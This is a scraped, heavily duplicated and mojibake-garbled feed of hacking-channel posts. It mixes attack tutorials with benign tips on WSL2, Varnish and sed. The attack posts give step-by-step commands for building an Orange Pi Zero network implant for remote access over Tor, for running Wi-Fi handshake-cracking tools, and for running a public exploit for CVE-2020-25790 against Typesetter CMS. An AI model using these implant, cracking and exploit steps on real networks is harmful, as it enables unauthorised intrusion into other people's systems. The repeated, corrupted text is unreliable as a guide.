β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hacking- Configuring network implants based on cheap SBC single board computers :
Step 1: Download the Orange Pi Armbian disk image
After selecting all the necessary components and checking the connectivity to the target router, you can start creating a hacker machine based on Orange Pi Zero by downloading the Armbian Orange Pi Zero image from the official developers website, and if you have Kali Linux installed, then this procedure can be done using the "wget" command.
~$ wget 'https://dl.armbian.com/orangepizero/Debian_stretch_next.7z'
2) This will download the file in the 7z archive format, so to extract the Debian image, you need to install the appropriate program if it is missing by executing the command described below:
~$ apt-get install p7zip-full -V
3) Next, you need to extract the image from the archive by making the following request:
~$ 7z x Debian_stretch_next.7z
4) After that, it is worth reviewing the extracted files by executing "ls", after which the list should look at the package "Armbian_5.75_Orangepizero_Debian_stretch_next_4.19.20.img", which will be used to install Debian on the microSD card installed in the Orange Pi Zero.
~$ ls -l
5) Stage 2: Burn the image to a microSD card
To do this, you will need to insert the card into a computer with Linux Kali installed via a special microSD-SD adapter, and if this is not possible, then you will have to buy this adapter or a card reader connected via USB. After connecting the SD card, you need to immediately look at the information about it by creating a request "dmesg".
~$ dmesg
6) Now you should pay attention to the letter assigned to the disk, which in our case is "sdb2", and this will be needed to execute the "dd" command in order to copy the ".img" image file. Thus, it will remain to replace the value "X" with the desired one in the "sdX" record, after which the copying process will begin, which takes about two minutes.
~$ dd if=/path/to/Armbian_5.75_Orangepizero_Debian_stretch_next_4.19.20.img of=/dev/sdX bs=512k status=progress
7) Step 3: Connect Orange Pi Zero to Router
Next, we take the created card and install it into our mini-computer, which is not yet ready for synchronization with the router due to the lack of initial settings. As a result, you will first need to connect the Pi Zero to your router via the Ethernet port and wait about five minutes for the SBC to boot correctly and identify itself on the network.
8) Step 4: Finding the Pi Zero's IP Address
At this stage, it is quite difficult to find out the IP address of our micro PC due to the lack of a normal interface and other tools for interaction, so it would be wise to use the same computer with Linux Kali OS connected to the same router with SBC.
Here you need to enter the command "nmap" with additional keys "-T4" and "-sn" to start scanning the entire network in search of active nodes.
~$ nmap -T4 -sn 192.168.1.1/24
9) Stage 5: Connect via SSH
The default password in the new SSH shell is "1234", but it must be changed, and a new profile must be created after the first login.
~$ ssh -p 22 root@192.168.0.165
The authenticity of host '192.168.0.165 (192.168.0.165)' can't be established.
ECDSA key fingerprint is SHA256:PE6127Kvx+twOLWK90mJDUQSUggH5ujh3h8liuLCR7w.
10) Then you just need to follow the simple instructions from the terminal window. At the same time, the data for logging into the account will not be needed later, but this process cannot be ignored. When entering your data, you will need to drive in the old and new password, and the fields with the name, phone number and room number can be left blank.
Creating a new user account. Press <Ctrl-C> to abort
!1) Updating the Pi Zero
Next, you will need to update the software by running the command as described below, after which usually a few outdated packages are reinstalled. During this procedure, the connection to the Pi Zero via SSH may be interrupted, leading to the SBC freezing, and this happens due to the loading of the openssh-server and wpasupplicant modules.
π¦Hacking- Configuring network implants based on cheap SBC single board computers :
Step 1: Download the Orange Pi Armbian disk image
After selecting all the necessary components and checking the connectivity to the target router, you can start creating a hacker machine based on Orange Pi Zero by downloading the Armbian Orange Pi Zero image from the official developers website, and if you have Kali Linux installed, then this procedure can be done using the "wget" command.
~$ wget 'https://dl.armbian.com/orangepizero/Debian_stretch_next.7z'
2) This will download the file in the 7z archive format, so to extract the Debian image, you need to install the appropriate program if it is missing by executing the command described below:
~$ apt-get install p7zip-full -V
3) Next, you need to extract the image from the archive by making the following request:
~$ 7z x Debian_stretch_next.7z
4) After that, it is worth reviewing the extracted files by executing "ls", after which the list should look at the package "Armbian_5.75_Orangepizero_Debian_stretch_next_4.19.20.img", which will be used to install Debian on the microSD card installed in the Orange Pi Zero.
~$ ls -l
5) Stage 2: Burn the image to a microSD card
To do this, you will need to insert the card into a computer with Linux Kali installed via a special microSD-SD adapter, and if this is not possible, then you will have to buy this adapter or a card reader connected via USB. After connecting the SD card, you need to immediately look at the information about it by creating a request "dmesg".
~$ dmesg
6) Now you should pay attention to the letter assigned to the disk, which in our case is "sdb2", and this will be needed to execute the "dd" command in order to copy the ".img" image file. Thus, it will remain to replace the value "X" with the desired one in the "sdX" record, after which the copying process will begin, which takes about two minutes.
~$ dd if=/path/to/Armbian_5.75_Orangepizero_Debian_stretch_next_4.19.20.img of=/dev/sdX bs=512k status=progress
7) Step 3: Connect Orange Pi Zero to Router
Next, we take the created card and install it into our mini-computer, which is not yet ready for synchronization with the router due to the lack of initial settings. As a result, you will first need to connect the Pi Zero to your router via the Ethernet port and wait about five minutes for the SBC to boot correctly and identify itself on the network.
8) Step 4: Finding the Pi Zero's IP Address
At this stage, it is quite difficult to find out the IP address of our micro PC due to the lack of a normal interface and other tools for interaction, so it would be wise to use the same computer with Linux Kali OS connected to the same router with SBC.
Here you need to enter the command "nmap" with additional keys "-T4" and "-sn" to start scanning the entire network in search of active nodes.
~$ nmap -T4 -sn 192.168.1.1/24
9) Stage 5: Connect via SSH
The default password in the new SSH shell is "1234", but it must be changed, and a new profile must be created after the first login.
~$ ssh -p 22 root@192.168.0.165
The authenticity of host '192.168.0.165 (192.168.0.165)' can't be established.
ECDSA key fingerprint is SHA256:PE6127Kvx+twOLWK90mJDUQSUggH5ujh3h8liuLCR7w.
10) Then you just need to follow the simple instructions from the terminal window. At the same time, the data for logging into the account will not be needed later, but this process cannot be ignored. When entering your data, you will need to drive in the old and new password, and the fields with the name, phone number and room number can be left blank.
Creating a new user account. Press <Ctrl-C> to abort
!1) Updating the Pi Zero
Next, you will need to update the software by running the command as described below, after which usually a few outdated packages are reinstalled. During this procedure, the connection to the Pi Zero via SSH may be interrupted, leading to the SBC freezing, and this happens due to the loading of the openssh-server and wpasupplicant modules.
12) onfiguring Remote Control for Orange Pi Zero
Next, you need to establish remote access to the SBC from anywhere in the world, for which you can use a variety of services, including OpenVPN and Ngrok, but we believe that it will be more interesting to configure a VPN through the Tor anonymous network and add the ability to sync over Wi-Fi.
The first method of work via Tor will allow you to remotely control the Pi Zero from anywhere, and a Wi-Fi connection allows an attacker to connect wirelessly within a range of no more than 200 meters, subject to line of sight.
12) Install Tor
First, you need to add the plugins from the Tor Project repository to your APT list using the "echo" command.
root@orangepizero:~# echo -e "deb https://deb.torproject.org/torproject.org $(lsb_release -sc) main \ndeb-src https://deb.torproject.org/torproje
ct.org $(lsb_release -sc) main" > /etc/apt/sources.list.d/tor.list
& setup wifi :)
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Next, you need to establish remote access to the SBC from anywhere in the world, for which you can use a variety of services, including OpenVPN and Ngrok, but we believe that it will be more interesting to configure a VPN through the Tor anonymous network and add the ability to sync over Wi-Fi.
The first method of work via Tor will allow you to remotely control the Pi Zero from anywhere, and a Wi-Fi connection allows an attacker to connect wirelessly within a range of no more than 200 meters, subject to line of sight.
12) Install Tor
First, you need to add the plugins from the Tor Project repository to your APT list using the "echo" command.
root@orangepizero:~# echo -e "deb https://deb.torproject.org/torproject.org $(lsb_release -sc) main \ndeb-src https://deb.torproject.org/torproje
ct.org $(lsb_release -sc) main" > /etc/apt/sources.list.d/tor.list
& setup wifi :)
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hacking- Configuring network implants based on cheap SBC single board computers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack wifi with gerix on linux :
#FastTips
1) download or clone https://github.com/kimocoder/gerix-wifi-cracker/archive/master.zip
2) apt-get install qt4-dev-tools
3) Running Gerix Wireless 802.11 Hacking Tool
$ python gerix.py
4) it gui interface appears now click at scan and attack
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack wifi with gerix on linux :
#FastTips
1) download or clone https://github.com/kimocoder/gerix-wifi-cracker/archive/master.zip
2) apt-get install qt4-dev-tools
3) Running Gerix Wireless 802.11 Hacking Tool
$ python gerix.py
4) it gui interface appears now click at scan and attack
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
UNDERCODE NEWS
New Unpatched Vulnerability in Typesetter CMS 5.1. #Vulnerabilities
β β β Uππ»βΊπ«Δπ¬πβ β β β
THAT'S IT
π¦Let's secure & hack New Unpatched Vulnerability in Typesetter CMS 5.1.
#Vulnerabilities
1) git clone https://github.com/t0gu/CVE-2020-25790
2) cd CVE-2020-25790
3) $ python3 -m pip install -r requirements.txt
4) $ python3 main.py -l admindb -p secret -u http://localhost:8090/old_typsetter/Typesetter/index.php -f simple.php.zip
5) usage: main.py [-h] -p PASSWORD -l LOGIN -u URL
==> Exploit for CVE 2020-25790
optional arguments:
-h, --help show this help message and exit
-p PASSWORD, --password PASSWORD
==> admin password
-l LOGIN, --login LOGIN
==> admin login
-u URL, --url URL ==> main URL
USE FOR LEARN !!
@UndercodeTesting verified
β β β Uππ»βΊπ«Δπ¬πβ β β β
THAT'S IT
π¦Let's secure & hack New Unpatched Vulnerability in Typesetter CMS 5.1.
#Vulnerabilities
1) git clone https://github.com/t0gu/CVE-2020-25790
2) cd CVE-2020-25790
3) $ python3 -m pip install -r requirements.txt
4) $ python3 main.py -l admindb -p secret -u http://localhost:8090/old_typsetter/Typesetter/index.php -f simple.php.zip
5) usage: main.py [-h] -p PASSWORD -l LOGIN -u URL
==> Exploit for CVE 2020-25790
optional arguments:
-h, --help show this help message and exit
-p PASSWORD, --password PASSWORD
==> admin password
-l LOGIN, --login LOGIN
==> admin login
-u URL, --url URL ==> main URL
USE FOR LEARN !!
@UndercodeTesting verified
β β β Uππ»βΊπ«Δπ¬πβ β β β
Free limited time: 4,5 Rating https://www.udemy.com/course/code-your-first-game/
π¦FREE VIRL Topologies :
This folder includes the Virtual Internet Routing Lab Personal Edition (VIRL PE) topologies used in [The security penetration testing (the art of hacking series) video course](https://www.safaribooksonline.com/library/view/security-penetration-testing/9780134833989/sptt_00_08_07_00.html).
[VIRL](http://get.virl.info/) is a powerful network virtualization and orchestration platform that enables the development of highly accurate models of existing or planned networks.
β β β Uππ»βΊπ«Δπ¬πβ β β β
This folder includes the Virtual Internet Routing Lab Personal Edition (VIRL PE) topologies used in [The security penetration testing (the art of hacking series) video course](https://www.safaribooksonline.com/library/view/security-penetration-testing/9780134833989/sptt_00_08_07_00.html).
[VIRL](http://get.virl.info/) is a powerful network virtualization and orchestration platform that enables the development of highly accurate models of existing or planned networks.
β β β Uππ»βΊπ«Δπ¬πβ β β β
OβReilly Online Learning
Security Penetration Testing The Art of Hacking Series LiveLessons
- Selection from Security Penetration Testing The Art of Hacking Series LiveLessons [Video]
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to enable WSL2 (Windows Subsystem for Linux version
2) and install the latest kernel
1) Microsoft has worked with Canonical to offer a complete Ubuntu-based Bash shell environment that runs on top of that subsystem, and it is now possible to run full Linux distributions. Technically it's not Linux at all.
2) Linux is the underlying operating system kernel that is not available here. Instead, it allows you to run the Bash shell and the same binaries that you normally run on Ubuntu Linux. Free software proponents often argue that the average Linux operating system should be called βGNU / Linuxβ because in fact there are many GNU programs running on the Linux kernel. The Bash shell you get is actually all these GNU utilities and other software.
3) This feature was originally called βBash on Ubuntu on Windows,β but it also allowed you to run Zsh and other command line shells. It now supports other Linux distributions as well. You can choose openSUSE Leap or SUSE Enterprise Server, Fedora or Kali Linux over Ubuntu.
4) There are some limitations here. It does not yet support background server software and does not officially work with graphical Linux desktop applications. Not all command line applications work as well as the feature is not perfect.
5) WSL2 is disabled by default on Windows. To enable it, you can use the graphical interface or the command line. To enable WSL2 at the command line, press Win + x and select " Windows PowerShell (administrator) " in the menu that opens :
6) It's important to open PowerShell with elevated privileges.
Run in it:
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
7) Wait for the download and execution to finish.
Restart your computer by pressing Enter.
8) Now open PowerShell as administrator again and run:
dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart<font></font>
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
9)Restart your computer again.
Download and install the latest WSL2 Linux Kernel from here: https://aka.ms/wsl2kernel
10) Open PowerShell again as administrator and run:
wsl --set-default-version 2
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to enable WSL2 (Windows Subsystem for Linux version
2) and install the latest kernel
1) Microsoft has worked with Canonical to offer a complete Ubuntu-based Bash shell environment that runs on top of that subsystem, and it is now possible to run full Linux distributions. Technically it's not Linux at all.
2) Linux is the underlying operating system kernel that is not available here. Instead, it allows you to run the Bash shell and the same binaries that you normally run on Ubuntu Linux. Free software proponents often argue that the average Linux operating system should be called βGNU / Linuxβ because in fact there are many GNU programs running on the Linux kernel. The Bash shell you get is actually all these GNU utilities and other software.
3) This feature was originally called βBash on Ubuntu on Windows,β but it also allowed you to run Zsh and other command line shells. It now supports other Linux distributions as well. You can choose openSUSE Leap or SUSE Enterprise Server, Fedora or Kali Linux over Ubuntu.
4) There are some limitations here. It does not yet support background server software and does not officially work with graphical Linux desktop applications. Not all command line applications work as well as the feature is not perfect.
5) WSL2 is disabled by default on Windows. To enable it, you can use the graphical interface or the command line. To enable WSL2 at the command line, press Win + x and select " Windows PowerShell (administrator) " in the menu that opens :
6) It's important to open PowerShell with elevated privileges.
Run in it:
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
7) Wait for the download and execution to finish.
Restart your computer by pressing Enter.
8) Now open PowerShell as administrator again and run:
dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart<font></font>
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
9)Restart your computer again.
Download and install the latest WSL2 Linux Kernel from here: https://aka.ms/wsl2kernel
10) Open PowerShell again as administrator and run:
wsl --set-default-version 2
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Docs
Manual installation steps for older versions of WSL
Step by step instructions to manually install WSL on older versions of Windows, rather than using the wsl install command.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦New tip Installing and Configuring Varnish: Part 1: How to Install Varnish on Debian and Ubuntu
Alexey 10/16/2020 0 Web server Hitch , Varnish Cache , caching
1. How to install Varnish on Debian and Ubuntu
1.1 How Varnish Caching Works for Apache
1.2 Correct Port Configuration for Varnish and Apache
1.3 Installing Varnish
1.4 Configuring Apache to Work with Varnish
1.5 Configuring Varnish to Work with Apache and Hitch
1.6 Checking Varnish and Apache
1.7 Configuring Hitch to Work with Varnish
1.8 Error "ERR_TOO_MANY_REDIRECTS"
1.9 How to tell if Varnish is running
1.10 How to Check Varnish Cache Speed
1.11 Renewing SSL Certificate Using Varnish and Hitch
1.12 Varnish is useless without configuration
2. How to set up Varnish, example rules
3. The Varnish Utilities
4. Varnish modules
π¦How Varnish Caching Works for Apache
To understand the essence of web server caching , you need to remember how a website works
1) There is a request from a user to show a certain page
2) Template files and source files are read from disk
3) The necessary information is retrieved from the database
4) Performs processing of information from the database
5) A page is formed that is sent to the user
6) Most of the simplest queries start the described chain of actions. Moreover, the number of operations performed can be even greater, or applications at the system level can be used to form the content of a web page.
7) And so every time - for each user request, the page is rebuilt.
π¦The essence of caching is that the page is created once and after that it is stored in the cache, which is kept in RAM. If a request comes back to show an already cached page
Benefits of using Varnish:
1) Varnish Cache boosts the speed of your content rich website.
2) Fast loading speeds help improve user experience and retain customers.
3) Your web server can efficiently handle website traffic with improved and smooth performance.
4) In the event of a server crash, your site will still work, delivering cached content.
5) You no longer need to update your existing hosting package from time to time as it can support high traffic. This, in turn, makes your site scalable.
6) A high website speed increases the likelihood that your website will hit search engines and show up in search results.
7) Varnish also reduces the number of servers required.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦New tip Installing and Configuring Varnish: Part 1: How to Install Varnish on Debian and Ubuntu
Alexey 10/16/2020 0 Web server Hitch , Varnish Cache , caching
1. How to install Varnish on Debian and Ubuntu
1.1 How Varnish Caching Works for Apache
1.2 Correct Port Configuration for Varnish and Apache
1.3 Installing Varnish
1.4 Configuring Apache to Work with Varnish
1.5 Configuring Varnish to Work with Apache and Hitch
1.6 Checking Varnish and Apache
1.7 Configuring Hitch to Work with Varnish
1.8 Error "ERR_TOO_MANY_REDIRECTS"
1.9 How to tell if Varnish is running
1.10 How to Check Varnish Cache Speed
1.11 Renewing SSL Certificate Using Varnish and Hitch
1.12 Varnish is useless without configuration
2. How to set up Varnish, example rules
3. The Varnish Utilities
4. Varnish modules
π¦How Varnish Caching Works for Apache
To understand the essence of web server caching , you need to remember how a website works
1) There is a request from a user to show a certain page
2) Template files and source files are read from disk
3) The necessary information is retrieved from the database
4) Performs processing of information from the database
5) A page is formed that is sent to the user
6) Most of the simplest queries start the described chain of actions. Moreover, the number of operations performed can be even greater, or applications at the system level can be used to form the content of a web page.
7) And so every time - for each user request, the page is rebuilt.
π¦The essence of caching is that the page is created once and after that it is stored in the cache, which is kept in RAM. If a request comes back to show an already cached page
Benefits of using Varnish:
1) Varnish Cache boosts the speed of your content rich website.
2) Fast loading speeds help improve user experience and retain customers.
3) Your web server can efficiently handle website traffic with improved and smooth performance.
4) In the event of a server crash, your site will still work, delivering cached content.
5) You no longer need to update your existing hosting package from time to time as it can support high traffic. This, in turn, makes your site scalable.
6) A high website speed increases the likelihood that your website will hit search engines and show up in search results.
7) Varnish also reduces the number of servers required.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦wifi hacking:
1)Start monitor mode
2)Stop monitor mode
3)Scan Networks
4)Getting Handshake
5)Create wordlist
6)Install Wireless tools
7)WPS Networks attacks
8)Scan for WPS Networks
9)Crack Handshake with rockyou.txt
10)Crack Handshake with wordlist
11)Crack Handshake without wordlist
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt-get update && apt-get install git
2) sudo git clone https://github.com/ankit0183/Wifi-Hacking
3) cd Wifi-Hacking/
4) sudo python3 Wifi-Hacking.py
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦wifi hacking:
1)Start monitor mode
2)Stop monitor mode
3)Scan Networks
4)Getting Handshake
5)Create wordlist
6)Install Wireless tools
7)WPS Networks attacks
8)Scan for WPS Networks
9)Crack Handshake with rockyou.txt
10)Crack Handshake with wordlist
11)Crack Handshake without wordlist
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt-get update && apt-get install git
2) sudo git clone https://github.com/ankit0183/Wifi-Hacking
3) cd Wifi-Hacking/
4) sudo python3 Wifi-Hacking.py
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ankit0183/Wifi-Hacking: Cyber Security Tool For Hacking Wireless Connections Using Built-In Kali Tools. Supports All Securitiesβ¦
Cyber Security Tool For Hacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2/TKIP/IES) - ankit0183/Wifi-Hacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IP TRACKI NG TOOLS :
* [AutoTTP](https://github.com/jymcheong/AutoTTP) - Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers.
* [Blue Team Training Toolkit (BT3)](https://www.bt3.no/) - Software for defensive security training, which will bring your network analysis training sessions, incident response drills and red team engagements to a new level.
* [Caldera](https://github.com/mitre/caldera) - Automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CKΓ’βΒ’) project.
* [DumpsterFire](https://github.com/TryCatchHCF/DumpsterFire) - Modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations.
* [Metta](https://github.com/uber-common/metta) - Information security preparedness tool to do adversarial simulation.
* [Network Flight Simulator](https://github.com/alphasoc/flightsim) - Lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IP TRACKI NG TOOLS :
* [AutoTTP](https://github.com/jymcheong/AutoTTP) - Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers.
* [Blue Team Training Toolkit (BT3)](https://www.bt3.no/) - Software for defensive security training, which will bring your network analysis training sessions, incident response drills and red team engagements to a new level.
* [Caldera](https://github.com/mitre/caldera) - Automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CKΓ’βΒ’) project.
* [DumpsterFire](https://github.com/TryCatchHCF/DumpsterFire) - Modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations.
* [Metta](https://github.com/uber-common/metta) - Information security preparedness tool to do adversarial simulation.
* [Network Flight Simulator](https://github.com/alphasoc/flightsim) - Lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - jymcheong/AutoTTP: Automated Tactics Techniques & Procedures
Automated Tactics Techniques & Procedures. Contribute to jymcheong/AutoTTP development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Shell uses sed command to delete specific lines :
The sed command deletes a specific line number
Delete row N
sed -i 'Nd' filename
Delete rows N~M
sed -i 'N,Md' filename # file[N,M]
Delete the line number represented by the shell variable (used with for statements)
sed -i "${var1},${var2}d" filename #
Delete the last line
sed -i '$d' filename
The sed command deletes lines containing specific characters
Delete the line containing "xxx"
sed -i '/xxx/d' filename
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Shell uses sed command to delete specific lines :
The sed command deletes a specific line number
Delete row N
sed -i 'Nd' filename
Delete rows N~M
sed -i 'N,Md' filename # file[N,M]
Delete the line number represented by the shell variable (used with for statements)
sed -i "${var1},${var2}d" filename #
Delete the last line
sed -i '$d' filename
The sed command deletes lines containing specific characters
Delete the line containing "xxx"
sed -i '/xxx/d' filename
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FREE CTF :
CTF 1: SEGV Hunt - Find a critical buffer overflow bug in glibc. Language: C - Difficulty level:
https://securitylab.github.com/ctf/segv
CTF 2: U-Boot Challenge - Follow in the footsteps of our security research team and discover 13 vulnerabilities un U-Boot. Language: C - Difficulty level:
https://securitylab.github.com/ctf/uboot
CTF 3: XSS-unsafe jQuery plugins - Find variants of jQuery plugins that expose their clients to undocumented XSS (cross-site scripting) vulnerabilities. Language: JavaScript - Difficulty level:
https://securitylab.github.com/ctf/jquery
π¦start tutorials :
https://help.semmle.com/QL/ql-training/intro-to-ql.html
https://help.semmle.com/QL/learn-ql/beginner/ql-tutorials.html
https://lgtm.com/help/lgtm/console/ql-cpp-basic-example
https://blog.semmle.com/python-code-analysis-ql/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FREE CTF :
CTF 1: SEGV Hunt - Find a critical buffer overflow bug in glibc. Language: C - Difficulty level:
https://securitylab.github.com/ctf/segv
CTF 2: U-Boot Challenge - Follow in the footsteps of our security research team and discover 13 vulnerabilities un U-Boot. Language: C - Difficulty level:
https://securitylab.github.com/ctf/uboot
CTF 3: XSS-unsafe jQuery plugins - Find variants of jQuery plugins that expose their clients to undocumented XSS (cross-site scripting) vulnerabilities. Language: JavaScript - Difficulty level:
https://securitylab.github.com/ctf/jquery
π¦start tutorials :
https://help.semmle.com/QL/ql-training/intro-to-ql.html
https://help.semmle.com/QL/learn-ql/beginner/ql-tutorials.html
https://lgtm.com/help/lgtm/console/ql-cpp-basic-example
https://blog.semmle.com/python-code-analysis-ql/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub Security Lab
SEGV hunt
Securing open source software, together.